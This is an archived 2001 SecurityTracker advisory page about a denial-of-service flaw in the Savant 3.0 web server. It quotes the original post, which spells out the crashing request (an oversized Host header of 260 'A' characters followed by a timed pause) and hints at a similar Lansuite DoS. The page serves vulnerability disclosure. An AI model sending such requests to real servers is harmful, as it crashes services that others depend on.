Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Savant Web Server Can Be Crashed Remotely With Certain HTTP Requests
|
|
SecurityTracker Alert ID: 1001248 |
|
SecurityTracker URL: http://securitytracker.com/id/1001248
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 6 2001
|
Impact:
Denial of service via network
|
Exploit Included: Yes
|
|
Description:
It was reported that the Savant web server contains a vulnerability that allows a remote user to send a special HTTP request to the server to cause the web server process to crash.
Apparently, the timing of the HTTP request is significant. If an HTTP request of the following format is sent:
GET / HTTP/1.1
Host:AAAAAAAAAAAAAAAAAAAA.....
(where A is 260 characters), then approximately 3 seconds elapse, then a carriage return is sent, the server application will reportedly crash. The server application will not issue any messages in the error log. On Windows 98, it will indicate that there was "an invalid page fault in module KERNEL32.DLL."
|
Impact:
A remote user can cause the server application to crash.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: savant.sourceforge.com (Links to External Site)
|
Cause:
Exception handling error
|
Underlying OS:
Windows (NT), Windows (95), Windows (98), Windows (2000)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 5 Apr 2001 16:13:16 -0000
Subject: Savant 3.0 Denial Of Service
|
Not exactly sure what the problem is because it will
handle the same request from a program that does
the same thing.
"Time is a factor" so pay attention man ;P
Connect to the server using telnet or somthing and
type in the following:
GET / HTTP/1.1
Host:AAAAAAAAAAAAAAAAAAAA.....
Where A x 260, hit return, wait 3 seconds, hit return
again and you should see it crash.I tested this locally
and remotely on both Windows98 and NT-4
Oh yeah, no error messages are given on NT for
some reason, the program simply terminates, yes,
no more connections, got that? the following was
displayed on Windows 98.If you do not give it the
time, it doesn't work, got that okay?
So dont come saying "I threw so many characters at
it and nothing happened" do as i say, and it will work.
SAVANT caused an invalid page fault in
module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300f0 CS=015f EIP=bff87eb5
EFLGS=00010212
EBX=011bff88 SS=0167 ESP=010bffec
EBP=010c0058
ECX=10020c01 DS=0167 ESI=8163c414 FS=41af
EDX=bff76859 ES=0167 EDI=010c0238 GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
Sending the same request using a perl script didn't
seem to affect the server at all, which is why i cant
tell whats wrong.But who cares? *shrug*
----------------------------------------------------------------
cut....
BTW Moderator, because you have been told that
maybe the Lansuite DoS against version 1.0.34
doesn't work can i tell you that it is still effective
against the latest 1.0.35 and is effective locally aswell
as remotely on both windows 98 and NT-4 as i have
tested.I have drwatson logs to prove it.
The trick in the problem is the forward slash before
HTTP/1.1 like %2fHTTP/1.1 - Get me sir?
So update your database please, people depend on
it, even the developers!!!
|
|
Go to the Top of This SecurityTracker Archive Page
|
